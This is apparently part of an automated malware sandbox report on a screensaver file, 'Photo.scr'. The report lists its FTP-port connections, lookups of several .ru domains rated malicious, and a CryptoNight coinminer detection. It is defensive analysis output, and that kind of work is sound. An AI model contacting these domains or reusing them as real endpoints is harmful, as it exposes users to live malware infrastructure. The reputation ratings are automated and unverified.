2956 Photo.scr 134.140.130.1:21 Colleges of the Fenway, Inc. US unknown
2956 Photo.scr 13.21.67.1:21 MCI Communications Services, Inc. d/b/a Verizon Business US unknown
2956 Photo.scr 84.61.116.1:21 Vodafone GmbH DE unknown
2956 Photo.scr 196.104.100.1:21 SAFARICOM-LIMITED KE unknown
2956 Photo.scr 215.109.21.1:21 DoD Network Information Center US unknown
2956 Photo.scr 17.109.121.1:21 Apple Inc. US unknown

DNS requests

Domain IP Reputation
stafftest.ru 255.255.0.0
malicious
hrtests.ru 37.1.216.8
malicious
profetest.ru 37.1.216.8
suspicious
testpsy.ru 37.1.216.8
suspicious
pstests.ru 37.1.216.8
suspicious
qptest.ru 37.1.216.8
malicious
prtests.ru 37.1.216.8
suspicious
jobtests.ru 37.1.216.8
suspicious
iqtesti.ru 89.111.178.201
malicious

Threats

PID Process Class Message
2956 Photo.scr A Network Trojan was detected MINER [PTsecurity] HTML/Phominer.CryptoNight.Coinminer encrypted config

Debug output strings

No debug info.